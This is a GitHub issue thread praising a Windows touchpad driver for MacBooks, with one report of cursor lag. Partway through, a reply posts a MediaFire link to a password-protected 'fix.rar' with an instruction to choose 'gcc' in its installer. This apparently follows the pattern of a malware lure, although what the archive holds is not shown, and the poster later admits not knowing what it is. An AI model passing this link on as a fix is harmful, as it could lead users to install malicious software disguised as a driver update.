imbushuo/mac-precision-touchpad #545: THIS IS AWESOME!!

Lion4K, 2024-08-27:
This is waaaaaay better than the default drivers Apple shipped with Bootcamp.

Thank you very much for your work!

Thus far the only thing I noticed that is kinda bad, but I can get used to, is the delay in witch it will start moving my cursor when I start dragging my finger on it, and it only happens sometimes, not always, so IDK.

as for compatibility I am using a MacBook Pro 8,1 (2011 13 inch) with Bootcamp 5.1 on Windows 10.

If I can help with any kind of log or testing any feature just let me know!

Thanks again!!

Lion4K, 2024-08-27:
I got this email, but I couldn't download it.

[image]

znacloud, 2024-08-30:
Awsome, It's much better than Trackpad++.

PeGeve, 2024-11-04:
> I got this email, but I couldn't download it. [...]

can u send that to me??

Lion4K, 2024-11-04:
> can u send that to me??

The link?

PeGeve, 2024-11-04:
yes the link @Lion4K

Lion4K, 2024-11-04:
> yes the link @Lion4K

Download
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

PeGeve, 2024-11-04:
@Lion4K it's missing says the file not there is there a way for you to send it to me, my email is realpegeve@gmail.com

Lion4K, 2024-11-04:
> @Lion4K it's missing says the file not there is there a way for you to send it to me, my email is realpegeve@gmail.com

I don't know what that is, I didn't download it either.
I just reported here because I also want to know.

PeGeve, 2024-11-04:
ohh ok